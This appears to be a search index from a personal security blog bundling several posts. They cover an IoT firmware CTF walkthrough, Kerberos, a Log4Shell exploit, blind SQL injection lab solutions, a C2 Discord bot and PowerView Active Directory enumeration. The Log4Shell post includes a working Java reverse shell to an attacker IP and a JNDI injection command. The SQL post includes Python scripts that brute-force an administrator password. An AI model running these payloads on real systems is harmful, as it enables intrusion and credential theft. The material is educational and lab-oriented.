index.json

[{"categories":["IOT-Hacking"],"contents":"Hello friends, I will make a new series about IOT Hacking because I want to share my knowledge with y’all, I hope it will be useful and easy to understand.\nWhat is Firmware ? simply it is like a brain of devices, firmware is a piece of software that embedded into hardware, without firmware most of electronic devices wouldn’t work, it’s just an iron piece, all smart devices has its own firmware like : TVs, Cars, Smart Plugs.\nFrom Where we can update Firmware?  Manufacturer makes the improvement Manually using SPI, JTAG OTA (Open The Aria)  I will discuss all of these in the next blog posts.\nfirmware Internals  Bootloader  bootloader is a code that execute before operating system starts and when you want to load a new firmware into device manually we need UART,SPI communication ports and bootloader help us to interact with devices.\n Kernel  kernel is the central module if an operating system, that connects system hardware to application software, it also responsible for process and memory management.\n File Systems  it contains all files that stored for the embedded device runtime, all web servers and network files\nSo What we can do with firmware?  we can find secrets-backdoor, passwords, API keys, private certs. vulnerabilities in individual binaries  Firmware Analysis I used HTB challenge called The Needle, and this is the description of the challenge.\nI use command file to detect file type\nThere are many types of file system like : SquashFS, CramFS, JFFS2, YAFFS2, EXT2. and the most common file system is SquashFS. and to detect the firmware file system you can use hexdump and search for magic byte or you can use binwalk, So its a Squashfs file system.\nyou can extract file system using Squashfs-tool or binwalk, I prefer to use binwalk.\nbinwalk -e firmware.bin You will find file system into squashfs-root directory\nThen we need to search for telnet creds and we will find it inro etc/scripts directory\nor simply you can use grep for this\nas we see in telnetd.sh the user is Device_Admin and the password stored in /etc/config/sign\nso let’s hit this creds\neasy..peasy we got the flag\n","date":"09 Feb, 2022","image":"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003cpicture\u003e\n  \u003csource srcset=\"/images/post/IOT_hu8691822668c41c6cdc423f5e9eaf9f53_1540542_545x0_resize_box_2.png\" media=\"(max-width: 575px)\"\u003e\n  \u003csource srcset=\"/images/post/IOT_hu8691822668c41c6cdc423f5e9eaf9f53_1540542_600x0_resize_box_2.png\" media=\"(max-width: 767px)\"\u003e\n  \u003csource srcset=\"/images/post/IOT_hu8691822668c41c6cdc423f5e9eaf9f53_1540542_700x0_resize_box_2.png\" media=\"(max-width: 991px)\"\u003e\n  \u003csource srcset=\"/images/post/IOT_hu8691822668c41c6cdc423f5e9eaf9f53_1540542_1110x0_resize_box_2.png\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" class=\"w-100 img-fluid rounded\" src=\"/images/post/IOT_hu8691822668c41c6cdc423f5e9eaf9f53_1540542_1110x0_resize_box_2.png\" alt=\"\" width=\"1883\" height=\"1009\"\u003e\n\u003c/picture\u003e\n \n \n \n\n","permalink":"https://dragonpwn.github.io/blog/iot-hacking-firmware-analysis/","tags":["IOT-hacking"],"title":"IOT Hacking | Firmware Analysis 101"},{"categories":["Network","Active-Directory"],"contents":"First of all in this blog we will discuss an authentication protocol called Kerberos.\n what is Kerberos? How does it work? Authentication flow How can you see your tickets?  What is Kerberos? Kerberos is an network security authentication protocol allow nodes to communicate with each other across untrusted network by using tickets, Kerberos builds on symmetric key cryptography and runs as a third party trusted server called Key Distribution Center (KDC), All environment users, machines, service that use Kerberos depend on KDC.\nHow does it works? Client : its a user who is request the service.\nServer : The service that the client want to access.\nTicket Granting Ticket (TGT) : Its a user authentication token issued by Key Distribution Center (KDC) used to request access token from (TGS).\nKey Distribution Center (KDC) : The trust third party which contain database and Authentication Service (AS) and the Ticket Granting Server (TGS).\nAuthentication Server (AS) : Authenticated service which authenticates client and issues them tickets and (TGS) which accept authenticated clients and issues them tickets to access another recourse.\nTicket Granting Server (TGS) : Its part of (KDC) That issues a service ticket .\nNote: Before issued service ticket you must have The (TGT) for AD Domain first .\nAuthentication flow   AS REQ (request TGT)   The User Asks for the (TGT) From Authentication Server (AS).\nThe request include the user principle Name (UPN) and timestamp , and its encrypts using the user password hash.\n  AS REP (receive TGT)   Verify User\u0026rsquo;s Creds\nThe KDC uses the UPN and search for the User in its database and uses the password hash to decrypt the message if is successfully decrypts the request and if the timestamp within the KDS\u0026rsquo;s configured time, the authentication is successful.\nThe Authentication Server computes (TGS) secret key then create a session key (sk1) encrypted by User secret key, then Authentication server generate a (TGT) contain the User ID , User network address, timestamp, lifetime, and SK1 the (TGS) secret key then encrypts the ticket .\nThe User Decrypt the message by using its secret key and extract the (SK1) and (TGT) to create the authenticator that validates the User\u0026rsquo;s (TGS) .\n  TGS REQ (Present TGT, request TGS)   The User send the present (TGT) to request (TGS)\n  TGS REP (receive TGS)   the KDC validates the (TGT), Then Generate the (TGS), The (TGS) uses (TGS) secret key to decrypt the (TGT) that received from user and extract the (SK1) and checks the user ID , network address and timestamp to make sure the (TGT) has not expired .\nif all checks are successful then the (KDC) generate a service session key (SK2) that is shared between the User and the target server .\nThen the (KDC) create service ticket that contain User ID, network address, timestamp and (SK2) , The ticket will encrypted with server secret key , then the User receive a message with the service ticket and (SK2) , all encrypted with (SK1) .\n  AP REQ (present TGS for access)   The target serve uses the server session key to decrypt the ticket and extract the (SK2) to decrypt the authenticator then checks the User ID, network address , also the server checks if the server ticket is expired .\n  AP REP (optional, used when mutual authentication is requests)   once check is finished the User receive message from Application server for verifying that they can authenticate each other .\nHow can you see your tickets? you can see all Kerberos ticket by using klist.exe you can view all issues tickets to you on your computer, you can use klist tickets command on cmd or power shell\n","date":"02 Feb, 2022","image":"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003cpicture\u003e\n  \u003csource srcset=\"/images/post/kerberos_huc41e8c461db695ff3a80113779d004dc_409377_545x0_resize_box_2.png\" media=\"(max-width: 575px)\"\u003e\n  \u003csource srcset=\"/images/post/kerberos_huc41e8c461db695ff3a80113779d004dc_409377_600x0_resize_box_2.png\" media=\"(max-width: 767px)\"\u003e\n  \u003csource srcset=\"/images/post/kerberos_huc41e8c461db695ff3a80113779d004dc_409377_700x0_resize_box_2.png\" media=\"(max-width: 991px)\"\u003e\n  \u003csource srcset=\"/images/post/kerberos_huc41e8c461db695ff3a80113779d004dc_409377_1110x0_resize_box_2.png\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" class=\"w-100 img-fluid rounded\" src=\"/images/post/kerberos_huc41e8c461db695ff3a80113779d004dc_409377_1110x0_resize_box_2.png\" alt=\"\" width=\"728\" height=\"410\"\u003e\n\u003c/picture\u003e\n \n \n \n\n","permalink":"https://dragonpwn.github.io/blog/kerberos101/","tags":["Network","Active-Directory"],"title":"Kerberos 101"},{"categories":["Web","CVEs","RCE"],"contents":"First of all to understand the vulnerability we should reverse it. This blog will Answer these Questions\n1- What is log4j\n2- LDAP\n3- JNDI\n4- How log4shell works\n5- Exploit\n6- Mitigation\n7- References\nWhat is log4j Log4j is an open-source logging framework written in java and it is apache logging service, it is used to store information and it has a lookup feature that allows it to download resources from external websites or java based applications via “JNDI” and log4shell hijacks this feature.\nLDAP Lightweight directory access protocol “LDAP” simply is a protocol that used for querying user information. Companies store usernames, passwords, email addresses, printer connections, and other static data within directories. LDAP is an open, vendor-neutral application protocol for accessing and maintaining that data. LDAP can also tackle authentication, so users can sign on just once and access many different files on the server.\nJNDI “JNDI” is abbreviation for Java Naming and Directory Interface , it is an API that provides naming and directory functionality to application written in Java used for interact with some services, one of them and we specificly use in this vulnerability is “LDAP” because Java applications cannot directly request to LDAP, So JNDI does this.\nHow log4Shell works By using the feature in log4j that we mentioned At the beginning we can inject JNDI with a recourses from an LDAP server that we control to serve a malicious java class then the server will download the payload that we injected then payload will be executed, finally we get full control on the server.\nExploit To exploit Log4j, firstly you need to have an malicious LDAP server like : marshalsec secondly you need to public IP and two ports one for LDAP and one for HTTP server that host the malicious class setup LDAP server\njava -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.LDAPREFServer \u0026quot;http://[IP]:[PORT]/#Reverse\u0026quot;\nimport java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host=\u0026#34;%s\u0026#34;; //Your Public IP  int port=%d; //Listener Port  String cmd=\u0026#34;/bin/sh\u0026#34;; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()\u0026gt;0) so.write(pi.read()); while(pe.available()\u0026gt;0) so.write(pe.read()); while(si.available()\u0026gt;0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } } we need to save and compile it\njavac Reverse.java -source 8 -target 8\nnow we need to run python SimpleHTTP server\nthen run netcat and listen to the same port you use in Reverse.java\nnow let’s curl the URL curl'[URL]/login?cmd=$\\{jndi ldap:/[IP]:[Port]/Reverse\\}'\nNow you Get RCE in application.\nMitigation disable all JNDI features and supported for message lookups removed from version 2.16.0 onward\nUpdate Log4j to version 2.17.0\nUsing IPS or Firewall will repel the proverbial “script kiddies” copy-pasting vanilla ${ jndi:...} strings\nReferences What Is LDAP \u0026amp; How Does It Work? - Okta\nJNDI Overview - oracle.com\nlog4j-shell-poc\n","date":"17 Jan, 2022","image":"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003cpicture\u003e\n  \u003csource srcset=\"/images/post/log4shell_hu1d29f51ed5bc8fa4a3098ac94f12825c_331977_545x0_resize_box_2.png\" media=\"(max-width: 575px)\"\u003e\n  \u003csource srcset=\"/images/post/log4shell_hu1d29f51ed5bc8fa4a3098ac94f12825c_331977_600x0_resize_box_2.png\" media=\"(max-width: 767px)\"\u003e\n  \u003csource srcset=\"/images/post/log4shell_hu1d29f51ed5bc8fa4a3098ac94f12825c_331977_700x0_resize_box_2.png\" media=\"(max-width: 991px)\"\u003e\n  \u003csource srcset=\"/images/post/log4shell_hu1d29f51ed5bc8fa4a3098ac94f12825c_331977_1110x0_resize_box_2.png\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" class=\"w-100 img-fluid rounded\" src=\"/images/post/log4shell_hu1d29f51ed5bc8fa4a3098ac94f12825c_331977_1110x0_resize_box_2.png\" alt=\"\" width=\"728\" height=\"410\"\u003e\n\u003c/picture\u003e\n \n \n \n\n","permalink":"https://dragonpwn.github.io/blog/log4shellcve-2021-44228/","tags":["Web","CVEs","RCE"],"title":"Log4Shell (CVE-2021-44228)"},{"categories":["Web","Sql Injection"],"contents":"In this blog we will solve portswigger labs for Blind SQL injection with python\nWhat is Blind SQL? It\u0026rsquo;s type of SQL injection happens when the web application is vulnerable but the response doesn\u0026rsquo;t contain results signify of any database errors.\nBlind SQL injection with conditional responses First of all we have a web application that contain TrackingId (Cookie) in request header.\nCookie: TrackingId= \u0026lsquo;Value\u0026rsquo;\nWhen the request contain TrackingId Cookie it means that the application determines whether this is a known user using SQL query.\nSELECT TrackingId FROM \u0026lt;Table_name\u0026gt; WHERE TrackingId = \u0026#39;value\u0026#39; So this query is vulnerable to SQL injection but the result aren\u0026rsquo;t returned to the user, okay let\u0026rsquo;s see what we can do.\nNote: I will solve Portswigger blind SQL labs to describe this techniques.\nFirstly open your burpsuit and run your proxie\nlet\u0026rsquo;s test it with basic sql query and see the behavior of the application.\nTrackingId=ofa7\u0026#39;+OR+1=1--; if we return to the web application we will see that \u0026ldquo;Welcom back\u0026rdquo; message is appeared.\nlet\u0026rsquo;s try false condition.\nTrackingId=ofa7\u0026#39;+OR+1=2--;  now we verify the payload, seconed step we will Enumerate for tables and i will using python for this.\nofa7\u0026#39;UNION SELECT \u0026#39;a\u0026#39; FROM \u0026lt;Table_Name\u0026gt; WHERE 1=1-- I have a list of table names.\nimport requests from sys import argv url = \u0026#34;\u0026#34; #laburl trust_string = \u0026#34;Welcome back\u0026#34; result = \u0026#39;\u0026#39; Table_name = argv[1] names = open(Table_name,\u0026#34;r\u0026#34;) Try = list(\u0026#34;\u0026#34;) for n in names: Try.append(n.strip()) print(\u0026#34;[+] Extract Info\u0026#34;) for T in Try: payload = \u0026#34;ofa7\u0026#39;UNION SELECT \u0026#39;a\u0026#39; FROM %sWHERE 1=1--\u0026#34; %T print(\u0026#34;Trying Table Name : %s\u0026#34; %T) cookie = {\u0026#34;TrackingId\u0026#34;:payload} response = requests.get(url, cookies=cookie) if trust_string in response.content.decode(\u0026#39;utf-8\u0026#39;): print(\u0026#34;[+] Result is : \u0026#34;, T) break  we got the Table_Name : users\nnow let\u0026rsquo;s enumerate the columns, we need to know the column that the administrator is part of it. so the query will be.\nofa7\u0026#39;UNION SELECT \u0026#39;a\u0026#39; FROM users WHERE %s=\u0026#34;administrator\u0026#34;-- all we will do that change the payload from the code\nand now we have Column_Name too : username\nanother way to enumerate columns:\nofa7\u0026#39;UNION SELECT column_name FROM information_schema.columns WHERE table_name=\u0026#39;users\u0026#39; And column_name LIKE \u0026#39;%s\u0026#39;— Enumerate for second column.\nto Enumerate for password length use:\nofa7\u0026#39;AND (SELECT \u0026#39;a\u0026#39; FROM users WHERE username=\u0026#39;administrator\u0026#39; AND LENGTH(password)\u0026gt;%i)=\u0026#39;a final payload:\nofa7\u0026#39;UNION SELECT \u0026#39;a\u0026#39; from users WHERE username = \u0026#39;administrator\u0026#39; AND substring(password,%i,1)=\u0026#39;%s\u0026#39;-- import requests import string characters = list(string.ascii_lowercase) characters += list(string.digits) url = \u0026#34;\u0026#34; #Target URL length = 20 trust_string = \u0026#34;Welcome back!\u0026#34; result = \u0026#39;\u0026#39; print(\u0026#34;[+] Extract Info\u0026#34;) for i in range(1, length+1): for char in characters: payload = \u0026#34;ofa7\u0026#39;UNION SELECT \u0026#39;a\u0026#39; from users WHERE username = \u0026#39;administrator\u0026#39; AND substring(password,%i,1)=\u0026#39;%s\u0026#39;--\u0026#34; %(i, char) print(\u0026#34;Trying Number %iwith: \u0026#34; %(i), char) cookie = {\u0026#34;TrackingId\u0026#34;:payload} response = requests.get(url, cookies=cookie) if trust_string in response.content.decode(\u0026#39;utf-8\u0026#39;): result += char break print(\u0026#34;[+] Result is : \u0026#34;, result)  Blind SQL with conditional error Password Length\n\u0026#39;|| (SELECT CASE WHEN LENGTH(password)\u0026gt;1 THEN TO_CHAR(1/0) ELSE \u0026#39;\u0026#39; END FROM \u0026lt;TABLE\u0026gt; WHERE \u0026lt;Column\u0026gt; = \u0026#39;...\u0026#39;)||\u0026#39; Password BruteForce\n\u0026#39;||(SELECT CASE WHEN SUBSTR(password,1,1)=\u0026#39;a\u0026#39; THEN TO_CHAR(1/0) ELSE \u0026#39;\u0026#39; END FROM users WHERE username=\u0026#39;administrator\u0026#39;)||\u0026#39; import requests import string characters = list(string.ascii_lowercase) characters += list(string.digits) url = \u0026#34;\u0026#34; #Target URL length = 20 result = \u0026#39;\u0026#39; print(\u0026#34;[+] Extract Info\u0026#34;) for i in range(1, length+1): for char in characters: payload = \u0026#34;a\u0026#39;||(SELECT CASE WHEN SUBSTR(password,%i,1)=\u0026#39;%s\u0026#39; THEN TO_CHAR(1/0) ELSE \u0026#39;\u0026#39; END FROM users WHERE username=\u0026#39;administrator\u0026#39;)||\u0026#39;\u0026#34; %(i, char) print(\u0026#34;Tring Number %iwith: \u0026#34; %(i), char) cookie = {\u0026#34;TrackingId\u0026#34;:payload} response = requests.get(url, cookies=cookie) if response.status_code == 500: result += char break print(\u0026#34;[+] Result is : \u0026#34;, result)  Blind SQL injection with time delays and information retrieval Microsoft SQL Server.\n\u0026#39;; IF (1=2) WAITFOR DELAY \u0026#39;0:0:10\u0026#39;— PostgreSQL.\n\u0026#39;||pg_sleep(5)— Blind SQL injection with time delays and information retrieval a\u0026#39;%%3BSELECT+CASE+WHEN+(username=\u0026#39;administrator\u0026#39;+AND+SUBSTRING(password,%i,1)=\u0026#39;%s\u0026#39;)+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END+FROM+users— import requests import string from requests.exceptions import Timeout characters = list(string.ascii_lowercase) characters += list(string.digits) url = \u0026#34;\u0026#34; #Target URL length = 20 result = \u0026#39;\u0026#39; print(\u0026#34;[+] Extract Info\u0026#34;) for i in range(1, length+1): for char in characters: payload = \u0026#34;a\u0026#39;%%3BSELECT+CASE+WHEN+(username=\u0026#39;administrator\u0026#39;+AND+SUBSTRING(password,%i,1)=\u0026#39;%s\u0026#39;)+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END+FROM+users--\u0026#34; %(i, char) print(\u0026#34;Tring Number %iwith: \u0026#34; %(i), char) cookie = {\u0026#34;TrackingId\u0026#34;:payload} try: requests.get(url, cookies=cookie , timeout=5) except Timeout: result += char break print(\u0026#34;[+] Result is : \u0026#34;, result)  ","date":"20 Sep, 2021","image":"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003cpicture\u003e\n  \u003csource srcset=\"/images/post/sqlblind_hue00967bb3e6bc301cd58e1e5e7b49167_75999_545x0_resize_box_2.png\" media=\"(max-width: 575px)\"\u003e\n  \u003csource srcset=\"/images/post/sqlblind_hue00967bb3e6bc301cd58e1e5e7b49167_75999_600x0_resize_box_2.png\" media=\"(max-width: 767px)\"\u003e\n  \u003csource srcset=\"/images/post/sqlblind_hue00967bb3e6bc301cd58e1e5e7b49167_75999_700x0_resize_box_2.png\" media=\"(max-width: 991px)\"\u003e\n  \u003csource srcset=\"/images/post/sqlblind_hue00967bb3e6bc301cd58e1e5e7b49167_75999_1110x0_resize_box_2.png\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" class=\"w-100 img-fluid rounded\" src=\"/images/post/sqlblind_hue00967bb3e6bc301cd58e1e5e7b49167_75999_1110x0_resize_box_2.png\" alt=\"\" width=\"728\" height=\"410\"\u003e\n\u003c/picture\u003e\n \n \n \n\n","permalink":"https://dragonpwn.github.io/blog/blind-sql/","tags":["Web","Sql Injection"],"title":"Blind SQL with Python"},{"categories":["RedTeaming","python"],"contents":"PickleC2-Bot This discord bot will help you to control your target through PickleC2\nDownload\nWHAT\u0026rsquo;s a PickleC2? PickleC2 is a simple C2 framework written in python3 used to help the community in Penetration Testers in their red teaming engagements.\nPickleC2 has the ability to import your own PowerShell module for Post-Exploitation and Lateral Movement or automate the process.\nCheck it out\nUSAGE List Listeners List Implants Interact Powershell CMD Help In the help option you can see the help of the functions\nHelp Implant Help listener Help Interact INSTALLATION You have two options to download the PickleC2-Bot feel free to use anyone of them.\nNOTE: The import thing is you need to put bot.py in the PickleC2 Folder.\nOneline You can install PickleC2-Bot directly through the following command\necho \u0026quot;Enter the PickleC2 Folder: \u0026quot;;read PickleC2Path;wget https://raw.githubusercontent.com/Sh4d3-Pwn3r/PickleC2-Bot/main/bot.py -O $PickleC2Path/bot.py;chmod +x $PickleC2Path/bot.py\rNormal Installation You also can install the PickleC2-Bot through the following commands\ncd {PickleC2_Path}\rgit clone https://github.com/Sh4d3-Pwn3r/PickleC2-Bot.git\rchmod +x bot.py\r After installing the script, you\u0026rsquo;ll need to create a discord dev account to generate a bot token then you\u0026rsquo;ll have to put it in the bot.py\n Credit I want to say a special thank to @xRET2pwn for giving me help and support .\nHappy Hacking :)\n","date":"19 Sep, 2021","image":"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003cpicture\u003e\n  \u003csource srcset=\"/images/post/bk_hu3fcdc7dc46f6a61329be4c09a6d27ea1_39321_545x0_resize_box_2.png\" media=\"(max-width: 575px)\"\u003e\n  \u003csource srcset=\"/images/post/bk_hu3fcdc7dc46f6a61329be4c09a6d27ea1_39321_600x0_resize_box_2.png\" media=\"(max-width: 767px)\"\u003e\n  \u003csource srcset=\"/images/post/bk_hu3fcdc7dc46f6a61329be4c09a6d27ea1_39321_700x0_resize_box_2.png\" media=\"(max-width: 991px)\"\u003e\n  \u003csource srcset=\"/images/post/bk_hu3fcdc7dc46f6a61329be4c09a6d27ea1_39321_1110x0_resize_box_2.png\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" class=\"w-100 img-fluid rounded\" src=\"/images/post/bk_hu3fcdc7dc46f6a61329be4c09a6d27ea1_39321_1110x0_resize_box_2.png\" alt=\"\" width=\"728\" height=\"410\"\u003e\n\u003c/picture\u003e\n \n \n \n\n","permalink":"https://dragonpwn.github.io/blog/picklec2-bot/","tags":["RedTeaming","python"],"title":"PickelC2-Bot"},{"categories":["Network","Active-Directory"],"contents":"In this part we will discus Domain Enumration using PowerView or ADModule and I\u0026rsquo;ll use PowerView.\nlet\u0026rsquo;s import it\nPS C:\\Users\\adlab\u0026gt; . .\\PowerView.ps1 Domain Enumeration current Domain: PS C:\\Users\\adlab\u0026gt; Get-NetDomain Get other Domains: PS C:\\Users\\adlab\u0026gt; Get-NetDomain -Domain \u0026lt;Domain name\u0026gt; Get Domain SID for current Domain: PS C:\\Users\\adlab\u0026gt; Get-DomainSID Get current Domain Controller: PS C:\\Users\\adlab\u0026gt; Get-NetDomainController Get Domain controller for another Domain: PS C:\\Users\\adlab\u0026gt; Get-NetDomainConroller -Domain \u0026lt;Domain Name\u0026gt; Get Domain Policy: PS C:\\Users\\adlab\u0026gt; Get-DomainPolicy User Enumertation. Get list of users in current Domain with all properties: PS C:\\Users\\adlab\u0026gt; Get-NetUser And we can Filter the result to get only Names of the Users: PS C:\\Users\\adlab\u0026gt; Get-NetUser | select cn Get info of the Specific User: PS C:\\Users\\adlab\u0026gt; Get-NetUser -SamAccountName \u0026lt;The name of User\u0026gt; Get User Property: PS C:\\Users\\adlab\u0026gt; Get-UserProperty Get Last password change: PS C:\\Users\\adlab\u0026gt; Get-UserProperty -Properties pwdlastset Get a particular String in a user's attributes: PS C:\\Users\\adlab\u0026gt; Find-UserField -SearchField Description -SearchTerm \u0026quot;password\u0026quot; sameaccountname Description --------------- ----------- SQL Service my pass is : MYpassword123$ Get activity logged users on a machine (needs local admin rights on the target): PS C:\\Users\\adlab\u0026gt; Get-NetLoggedon -ComputerName \u0026lt;servername\u0026gt; To Get list of names of computers in current Domain:  PS C:\\Users\\adlab\u0026gt; Get-NetComputer Get more Data about Computers in Current Domain: PS C:\\Users\\adlab\u0026gt; Get-NetComputer -FullData To know which machines are alive or not: PS C:\\Users\\adlab\u0026gt; Get-NetComputer -ping Get Groups for current Domain: PS C:\\Users\\adlab\u0026gt; Get-NetGroup Get Groups for specific Domain: PS C:\\Users\\adlab\u0026gt; Get-NetGroup -Domain \u0026lt;targetdoamin\u0026gt; Get more Data about Groups for Current Domain: PS C:\\Users\\adlab\u0026gt; Get-NetGroup -FullData Get All Groups in the Domain containing the word \"admin\": PS C:\\Users\\adlab\u0026gt; Get-NetGroup *admin* Get all members of the Domain Admins Group: PS C:\\Users\\adlab\u0026gt; Get-NetGroupMember -GroupName 'Domain Admins' Get list of membership on a machine (needs administrator priv on non DC machine): PS C:\\Users\\adlab\u0026gt; Get-NetLocalGroup -ComputerName \u0026lt;dcname\u0026gt; Get list of all local Groups on a machine (needs administrator priv on non DC machine): PS C:\\Users\\adlab\u0026gt; Get-NetLocalGroup -ComputerName \u0026lt;dcname\u0026gt; -ListGroups Get Shares files in current Domain: PS C:\\Users\\adlab\u0026gt; Invoke-ShareFinder -verbose Get sensitive files on computers in current Domain: PS C:\\Users\\adlab\u0026gt; Invoke-FileFinder -verbose Get all fileservers in current Domain: PS C:\\Users\\adlab\u0026gt; Get-NetFileserver -verbose notice :: if you do not know what is GPO go to introduction of Active Directory you will get it there.\nGet list of GPO in current domain:  PS C:\\Users\\adlab\u0026gt; Get-NetGPO Filter the result to get only the Group policy: PS C:\\Users\\adlab\u0026gt; Get-NetGPO | select displayname Get list of GPO for specific domain: PS C:\\Users\\adlab\u0026gt; Get-NetGPO -ComputerName \u0026lt;ComputerName\u0026gt; And there is a module in PowerView called (gpresult) It display the resultant set of policy information for a target user and computer, and we will use pareameter \u0026lsquo;/R\u0026rsquo; for display SRoP summary data and also we can use too \u0026lsquo;/v\u0026rsquo; parameter to display verbose information of the domain\nPS C:\\Users\\adlab\u0026gt; gpresult /R /V Get restricted groups: PS C:\\Users\\adlab\u0026gt; Get-NetGPOGroup Get users which are in local Group of machine using GPO: PS C:\\Users\\adlab\u0026gt; Find-GPOComputer -ComputerName \u0026lt;domainname\u0026gt; Get machines where the given user is member of a specific group: PS C:\\Users\\adlab\u0026gt; Find-GPOLocation -UserName \u0026lt;username\u0026gt; -verbose Get OU in a Domain: PS C:\\Users\\adlab\u0026gt; Get-NetOU -FullData Get GPO applied on an OU using gplink: PS C:\\Users\\adlab\u0026gt; GetNetGPO -GPOname \u0026quot;gplink\u0026quot; Enumeerate ACLs: Get ACLs associated with specific object: PS C:\\Users\\adlab\u0026gt; Get-ObjectAcl -SamAccountName \u0026lt;domainname\u0026gt; -ResolveGUIDs Get a list of all Domain trusts for the cuurent Domain: PS C:\\Users\\adlab\u0026gt; Get-NetDomainTrusts Get Details about the current Forest: PS C:\\Users\\adlab\u0026gt; Get-NetForest Get All domains in the current Forest: PS C:\\Users\\adlab\u0026gt; Get-NetForestDomain Get all global cataloges for the current Forest: PS C:\\Users\\adlab\u0026gt; Get-NetForestCatalog Get Trusts of the Forest: PS C:\\Users\\adlab\u0026gt; Get-NetForestTrust Get a list of all Domain trusts for the cuurent Domain: PS C:\\Users\\adlab\u0026gt; Get-NetDomainTrusts Get all machines on the current domain that the current user has local admin access: PS C:\\Users\\adlab\u0026gt; Find-LocalAdminAccess -Verbose There is another way if ports like (RPC, SMB) used by Find-LocalAdminAccess are blocked , we can done it using remote administrator tools like WMI and PowerShell remoting.\nPS C:\\Users\\adlab\u0026gt; . .\\Find-WMILocalAdminAccess.ps1 PS C:\\Users\\adlab\u0026gt; Find-WMILocalAdminAccess Get Computers where a domain admin has sessions: PS C:\\Users\\adlab\u0026gt; Invoke-UserHunter To confirm admin access: PS C:\\Users\\adlab\u0026gt; Invoke-UserHunter -CheckAccess Get computers that domain admin looged in: PS C:\\Users\\adlab\u0026gt; Invoke-UserHunter -Stealth know we will talk about Defending part and have a look at most lethal enumeration techniques : user hunting.\nNetcease : is an script which changes permission on the NetSessionEnum method by removing permission for Authenticated users group.\nThis script fails many of attacker\u0026rsquo;s session enumeration.\nPS C:\\Users\\adlab\u0026gt; . .\\NetCease.ps1 There is another interesting script from the same auther is SAMRi10 which hardens Windows10 and windows server 2015 against enumertion which uses SAMAR protocol like (net.exe)\nEnumeration Using BloodHound: Using powershell module ingestor\nPS C:\\Users\\adlab\u0026gt; . .\\SharpHound.ps1 PS C:\\Users\\adlab\u0026gt; Invoke-BloodHound -CollectionMethod All Using powershell module ingestor\nPS C:\\Users\\adlab\u0026gt; .\\SharpHound.exe -CollectionMethod All And now we finish this sieres (Active Directory Enumeration) in the next sieres we will talk about Local Privilege Escalation part , I hope you enjoy reading .. see you \u0026lt;3.\n","date":"16 Feb, 2021","image":"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003cpicture\u003e\n  \u003csource srcset=\"/images/post/Enum_hud79ae7462b158694cac2a133e35ab474_90175_545x0_resize_box_2.png\" media=\"(max-width: 575px)\"\u003e\n  \u003csource srcset=\"/images/post/Enum_hud79ae7462b158694cac2a133e35ab474_90175_600x0_resize_box_2.png\" media=\"(max-width: 767px)\"\u003e\n  \u003csource srcset=\"/images/post/Enum_hud79ae7462b158694cac2a133e35ab474_90175_700x0_resize_box_2.png\" media=\"(max-width: 991px)\"\u003e\n  \u003csource srcset=\"/images/post/Enum_hud79ae7462b158694cac2a133e35ab474_90175_1110x0_resize_box_2.png\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" class=\"w-100 img-fluid rounded\" src=\"/images/post/Enum_hud79ae7462b158694cac2a133e35ab474_90175_1110x0_resize_box_2.png\" alt=\"\" width=\"728\" height=\"410\"\u003e\n\u003c/picture\u003e\n \n \n \n\n","permalink":"https://dragonpwn.github.io/blog/domain-enumeration/","tags":["Network","Active-Directory"],"title":"Active Directory Enumeration"},{"categories":["Network","Active-Directory"],"contents":"Active Directory (AD): Its a directory service used to managed windows network, Store the information on the network and makes it easily available to users and admin.\nDomain Cotroller (DC): In short the DC is The Admin of the Active Directory that he has an access of all the network, An explanation for that the role of Domain Controler is to provide authentication and Authorization to different services and users.\nNTDS.DIT: An Active Directory contains DataBase that has information about users, services and applications, in NTDS.DIT file and this file locate is \u0026ldquo;%SystemROOT\\NTDS%\u0026rdquo; folder, Bassed on that it is the most critical file if the AD.\nAD components you should know. Domain: Domain is used to group objects together and manage them and it provides an Authentication and Authorization that provides a way to limit the scop of access to the resourses of that domain.\nTrees: Goup of Domains with the same root and Domains in this group trust each other ex: CORP.local \u0026raquo; x.CORP.local , y.CORP.local.\nForest: forest is the highst level of the organization hierarchy and it contains a collection of trees and the trees are connected by trust relationships.\nOrganizational Units (OU): It is a container holds Active Directory objects like users, groups, and computers, it is the smallest unit in AD, the administrator can assign group policy settings or account permissions, and OU cant contain objects from another Domain.\nTrust: Its way to let more than differant Domain can access resources between other in order to gain permission to this resources, there are two type of trusts.\nDirectional Trust: This trust is easy to understand its just trusting domain to trusted domain.\nTransitive Trust: Its a two-way relationship created between parent and child Domains, when we created Domain it shares resources with parent domain by default, the transitive property of equality states that if a = b and b = c, then a = c. transitive trust relationship, if domain A trusts domain B, and domain B trusts domain C, then domain A trusts domain C.\nLightweight Directory Access Protocol (LDAP): AD 